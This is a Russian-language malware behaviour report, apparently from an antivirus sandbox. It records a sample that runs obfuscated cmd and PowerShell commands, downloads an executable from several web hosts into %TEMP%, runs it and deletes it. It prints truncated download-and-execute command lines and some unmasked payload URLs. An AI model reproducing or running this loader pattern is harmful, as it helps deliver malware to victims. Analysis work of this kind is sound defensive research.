Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V:O/C"set 1gIn=;'TvJ'=IqH$}}{hctac}};kaerb;'hin'=GcM$;VSt$ metI-ekovnI{ )00008 eg- htgnel.)VSt$ metI-teG(( fI;'nMn'=urT$;)VSt$ ,UDc$(eliFdaolnwoD.mHM${yrt{)bnj$ ni UDc$(hcaerof;'exe.'+Vzq$+'\'...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\206.exe
Удаляет следующие файлы
- %TEMP%\206.exe
Сетевая активность
Подключается к
- 'lu###mydog.com':80
- 'ky#####landmusic.com':80
- 'la####musicco.com':80
- 'la####musicco.com':443
- 'ro#####erproducts.co.za':80
- 'ro#####erproducts.co.za':443
TCP
Запросы HTTP GET
- http://lu###mydog.com/Tl
- http://lu###mydog.com/cgi-sys/suspendedpage.cgi
- http://ky#####landmusic.com/8aP
- http://la####musicco.com/NJ3Ta
- http://ro#####erproducts.co.za/s
Другие
- 'la####musicco.com':443
- 'ro#####erproducts.co.za':443
UDP
- DNS ASK ma###amedia.com
- DNS ASK lu###mydog.com
- DNS ASK ky#####landmusic.com
- DNS ASK la####musicco.com
- DNS ASK ro#####erproducts.co.za
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:O/C"set 1gIn=;'TvJ'=IqH$}}{hctac}};kaerb;'hin'=GcM$;VSt$ metI-ekovnI{ )00008 eg- htgnel.)VSt$ metI-teG(( fI;'nMn'=urT$;)VSt$ ,UDc$(eliFdaolnwoD.mHM${yrt{)bnj$ ni UDc$(hcaerof;'exe.'+Vzq$+'\'...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /S /D /c" echo powershell $dFl='kzi';$MHm=new-object Net.WebClient;$jnb='http://ma###amedia.com/iYwNcae@http://lunasmydog.com/Tl@http://kylerowlandmusic.com/8aP@http://lawsonmusicco.com/NJ3Ta@h...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' =kzi
